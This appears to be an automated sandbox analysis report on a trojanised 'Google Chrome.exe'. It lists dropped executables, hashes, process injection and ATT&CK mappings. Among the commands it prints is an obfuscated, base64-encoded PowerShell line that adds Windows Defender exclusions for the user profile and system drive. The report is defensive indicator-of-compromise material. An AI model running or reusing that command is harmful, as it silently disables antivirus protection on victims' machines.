aec21e789d72c471183f2c43a87632110c7c10c9762d53e19994c8ab3e558479

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
26-05-2024 10:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Google Chrome.exe
Size

165.5MB
MD5

17decaf6c504ccd48733a99c082a0371
SHA1

888f60ab988a40ac9b66f868de708bf7fdddc8c6
SHA256

aec21e789d72c471183f2c43a87632110c7c10c9762d53e19994c8ab3e558479
SHA512

9ed7a6674abee933c409d0465ef42de189595eeec8381b8364e5e8b3be7d398d1df89e260deba589a8e121ccdf29f94ecaaee502d2ce6948645ad945a1d50da0
SSDEEP

3145728:PGljfMBjDxz2K+2yXvdlOuAbUHesRlgpAr2BhD4E4QzTXD:uJM5Dxz2Tt1lFeUHe0Sp9J4S

Score

7^/10

execution pyinstaller upx

Malware Config

Signatures

Executes dropped EXE 9 IoCs

Processes:

driverload.exekernel.exedriverload.exeMedal.exeMedal.exeUpdate.exekernel.exeUpdate.exe

pid process

2676 driverload.exe
1944 kernel.exe
280 driverload.exe
2824 Medal.exe
2828 Medal.exe
1940 Update.exe
1200
1076 kernel.exe
2744 Update.exe

pid	process
2676	driverload.exe
1944	kernel.exe
280	driverload.exe
2824	Medal.exe
2828	Medal.exe
1940	Update.exe
1200
1076	kernel.exe
2744	Update.exe

Loads dropped DLL 42 IoCs

Processes:

Google Chrome.exedriverload.exedriverload.exeMedal.exeMedal.exekernel.exekernel.exeUpdate.exeUpdate.exe

pid	process
788	Google Chrome.exe
788	Google Chrome.exe
2676	driverload.exe
788	Google Chrome.exe
280	driverload.exe
280	driverload.exe
280	driverload.exe
280	driverload.exe
280	driverload.exe
280	driverload.exe
2824	Medal.exe
280	driverload.exe
2828	Medal.exe
2828	Medal.exe
2828	Medal.exe
2828	Medal.exe
2828	Medal.exe
2828	Medal.exe
2828	Medal.exe
788	Google Chrome.exe
1944	kernel.exe
1076	kernel.exe
1076	kernel.exe
1076	kernel.exe
1076	kernel.exe
1076	kernel.exe
1076	kernel.exe
1076	kernel.exe
1940	Update.exe
2744	Update.exe
2744	Update.exe
2744	Update.exe
2744	Update.exe
2744	Update.exe
2744	Update.exe
2744	Update.exe
1200
1200
1200
1200
1200
1200

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI28242\python312.dll	upx
behavioral1/memory/2828-377-0x000007FEF5550000-0x000007FEF5C15000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI19442\python312.dll	upx
behavioral1/memory/1076-1728-0x000007FEF4E80000-0x000007FEF5545000-memory.dmp	upx

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2076 powershell.exe

pid	process
2076	powershell.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\driverload.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2076 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2076 powershell.exe

pid	process
2076	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2076	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

Google Chrome.exedriverload.exeMedal.exekernel.exeUpdate.exe

description	pid	process	target process
PID 788 wrote to memory of 2076	788	Google Chrome.exe	powershell.exe
PID 788 wrote to memory of 2076	788	Google Chrome.exe	powershell.exe
PID 788 wrote to memory of 2076	788	Google Chrome.exe	powershell.exe
PID 788 wrote to memory of 2076	788	Google Chrome.exe	powershell.exe
PID 788 wrote to memory of 2676	788	Google Chrome.exe	driverload.exe
PID 788 wrote to memory of 2676	788	Google Chrome.exe	driverload.exe
PID 788 wrote to memory of 2676	788	Google Chrome.exe	driverload.exe
PID 788 wrote to memory of 2676	788	Google Chrome.exe	driverload.exe
PID 788 wrote to memory of 1944	788	Google Chrome.exe	kernel.exe
PID 788 wrote to memory of 1944	788	Google Chrome.exe	kernel.exe
PID 788 wrote to memory of 1944	788	Google Chrome.exe	kernel.exe
PID 788 wrote to memory of 1944	788	Google Chrome.exe	kernel.exe
PID 2676 wrote to memory of 280	2676	driverload.exe	driverload.exe
PID 2676 wrote to memory of 280	2676	driverload.exe	driverload.exe
PID 2676 wrote to memory of 280	2676	driverload.exe	driverload.exe
PID 788 wrote to memory of 2824	788	Google Chrome.exe	Medal.exe
PID 788 wrote to memory of 2824	788	Google Chrome.exe	Medal.exe
PID 788 wrote to memory of 2824	788	Google Chrome.exe	Medal.exe
PID 788 wrote to memory of 2824	788	Google Chrome.exe	Medal.exe
PID 2824 wrote to memory of 2828	2824	Medal.exe	Medal.exe
PID 2824 wrote to memory of 2828	2824	Medal.exe	Medal.exe
PID 2824 wrote to memory of 2828	2824	Medal.exe	Medal.exe
PID 788 wrote to memory of 1940	788	Google Chrome.exe	Update.exe
PID 788 wrote to memory of 1940	788	Google Chrome.exe	Update.exe
PID 788 wrote to memory of 1940	788	Google Chrome.exe	Update.exe
PID 788 wrote to memory of 1940	788	Google Chrome.exe	Update.exe
PID 1944 wrote to memory of 1076	1944	kernel.exe	kernel.exe
PID 1944 wrote to memory of 1076	1944	kernel.exe	kernel.exe
PID 1944 wrote to memory of 1076	1944	kernel.exe	kernel.exe
PID 1940 wrote to memory of 2744	1940	Update.exe	Update.exe
PID 1940 wrote to memory of 2744	1940	Update.exe	Update.exe
PID 1940 wrote to memory of 2744	1940	Update.exe	Update.exe

C:\Users\Admin\AppData\Local\Temp\Google Chrome.exe
"C:\Users\Admin\AppData\Local\Temp\Google Chrome.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdABoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAZQBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAdABuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAdQBwACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Users\Admin\AppData\Local\Temp\driverload.exe
"C:\Users\Admin\AppData\Local\Temp\driverload.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2676

C:\Users\Admin\AppData\Local\Temp\driverload.exe
"C:\Users\Admin\AppData\Local\Temp\driverload.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:280

C:\Users\Admin\AppData\Local\Temp\kernel.exe
"C:\Users\Admin\AppData\Local\Temp\kernel.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1944

C:\Users\Admin\AppData\Local\Temp\kernel.exe
"C:\Users\Admin\AppData\Local\Temp\kernel.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1076

C:\Users\Admin\AppData\Local\Temp\Medal.exe
"C:\Users\Admin\AppData\Local\Temp\Medal.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2824

C:\Users\Admin\AppData\Local\Temp\Medal.exe
"C:\Users\Admin\AppData\Local\Temp\Medal.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2828

C:\Users\Admin\AppData\Local\Temp\Update.exe
"C:\Users\Admin\AppData\Local\Temp\Update.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1940

C:\Users\Admin\AppData\Local\Temp\Update.exe
"C:\Users\Admin\AppData\Local\Temp\Update.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2744

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Medal.exe
Filesize
8.3MB

MD5
1f5da73f51ccdae2f8842b1c0a25094e

SHA1
24aab083adfbe9691f3d61dee886501e2dee97ee

SHA256
b2830534c4575cffc6fad46ff35c3ea0076f22212c5b5491e62f5970c3307a92

SHA512
62e8cce9ebf15362f242d561cd059bc722299931e3279b8b2258d66fe4147f929c6032041869fc19ad62e17a7799160e1b996d7229b0732b1a2585daeaa3884e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19402\attrs-23.2.0.dist-info\INSTALLER
Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19442\python312.dll
Filesize
1.7MB

MD5
7ef625a8207c1a1a46cb084dfc747376

SHA1
8cc35164b7cda0ed43eb07fdb1ea62c23ae1b6f9

SHA256
c49c511fa244815cc1ab62a4dab0a4a0ffc0a1b99ac9333f60a3f795b99f65ed

SHA512
0872033ee3dc46066db3a44693d3802b5d158ef9e0481d1e33275934800cea6a79870ac0776a85f113daa67d9629b6d8bc67cea3d2a99445114140de1c29e5a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\api-ms-win-core-file-l1-2-0.dll
Filesize
14KB

MD5
accda7da6ed4160c1754ca3b0cfbce57

SHA1
d5364a1e636adf29fd61132fa873de2adcbe00f0

SHA256
043c8baa58fcc887ebd7a7ef79200544fd7b18ed7511f9775f6747ca9cd918b5

SHA512
499a5464a102fea003d5b9d7afeaa4858556bd24a91976ff3fe4b67daeaa99700b1c3ff7e1f3088bf11961b65aa3ef09f8c4f52272a726cd7c95e0823b8e9283

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\api-ms-win-core-file-l2-1-0.dll
Filesize
14KB

MD5
e3eeb2ff32d79107e67400f9dffe0368

SHA1
4252156f11124d40e6b26f5d0f9664d199b52d69

SHA256
5421dcbbbf2069d3853f42742c9111e159893221dcaa1d33871a4599590cf682

SHA512
a9c5d9077902739a99603974ba21ffc040e6438ebdd61e5aab4b415e45f9613eaf4827ea555e85a074153608c15a1bfb0296ea7db68837fa10773478ec931e8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\api-ms-win-core-localization-l1-2-0.dll
Filesize
17KB

MD5
401d2131723bbf0efb315d39ccc85233

SHA1
64e632a257f51ed7d795ef0f555794958521dcb8

SHA256
2c522ac9cca8efcafe5202b9e2dcb514694a67bab7e23b097accad31740c22db

SHA512
26966bcbd3c92c224e2b2fd438e1dc75c38c85ce2e99e19afa8705417b27958356249bcd8a6dde92546a135ed2a669ee227618f173987b1219a21455bba12ed6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\api-ms-win-core-processthreads-l1-1-1.dll
Filesize
15KB

MD5
b2a445a5fc86c17cdbc8c59d9ddbf35a

SHA1
28e32b66fbd7639c4cbb1e464211871fbc1e2462

SHA256
cf59f033a5287274142466c40717c942b26aaa75c8dbb99c022998d1e044c3fa

SHA512
9b325edd726db17d5b4cac05d49ef4e0a20b2699e633210c19f218dd6d2b7aefdcb33f95be6fce14a841660ec0c43e9b182dae0fcde99ef052001c5a83c0fb69

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\api-ms-win-core-timezone-l1-1-0.dll
Filesize
14KB

MD5
951e8d57298ee66b004efc821cf84e5c

SHA1
d1cb4e15360a82db5d1315ad22e5238cd9d3b4e5

SHA256
2ea87eaa2651508c5b745d8dc71843406259b5aefb21f16e05af722575dbe7c5

SHA512
ac80bd6bfda546cfbe49decd46ffc8d9bd1d929d171d5072c48d0a239ca1e23742016f1477d6bb290e7c5b807a1bd6a3c1f20e64be1a007ff71bb1f7457013e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26762\python312.dll
Filesize
6.6MB

MD5
3c388ce47c0d9117d2a50b3fa5ac981d

SHA1
038484ff7460d03d1d36c23f0de4874cbaea2c48

SHA256
c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

SHA512
e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\python312.dll
Filesize
1.7MB

MD5
fb8bedf8440eb432c9f3587b8114abc0

SHA1
136bb4dd38a7f6cb3e2613910607131c97674f7c

SHA256
cb627a3c89de8e114c95bda70e9e75c73310eb8af6cf3a937b1e3678c8f525b6

SHA512
b632235d5f60370efa23f8c50170a8ac569ba3705ec3d515efcad14009e0641649ab0f2139f06868024d929defffffefb352bd2516e8cd084e11557b31e95a63

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI26762\ucrtbase.dll
Filesize
964KB

MD5
509c2035ea7a46fe34f7d46fb506d3a1

SHA1
70805e32b8637d63661b62a83b4ef788b4e4aed1

SHA256
5b81ad36ccb0714567797fd15f703d677f0c061936b61d97920dd79e3cdedbf2

SHA512
54143819ba757fe07f29bc2322fbdf3f1b283db0b19a85da1024c9475ea37d0ee93364a5b38c3f95912e6dd51f2a1ad86bc651afac410fffabee1001c3345cda

Download Submit
\Users\Admin\AppData\Local\Temp\driverload.exe
Filesize
19.6MB

MD5
8a7d115258576122b86dc2803a4c79d1

SHA1
dae1ac1f87e6364ea6c00e5af48b0ca228705b0e

SHA256
af7d5ec98d78c6401dfbdfa822d868ecac900596fd2de8d2af5a571b5c6fee4e

SHA512
ad8549eb9dcd72949f6b8270ba2852a76f3b5ffb1bacae124b1e1808bcc90936c6555539a5b526b120ea8493f24efafd328fbabaa7d994b316e47beb1e352d49

Download Submit
memory/1076-1728-0x000007FEF4E80000-0x000007FEF5545000-memory.dmp

Filesize
6.8MB

Download
memory/2828-377-0x000007FEF5550000-0x000007FEF5C15000-memory.dmp

Filesize
6.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads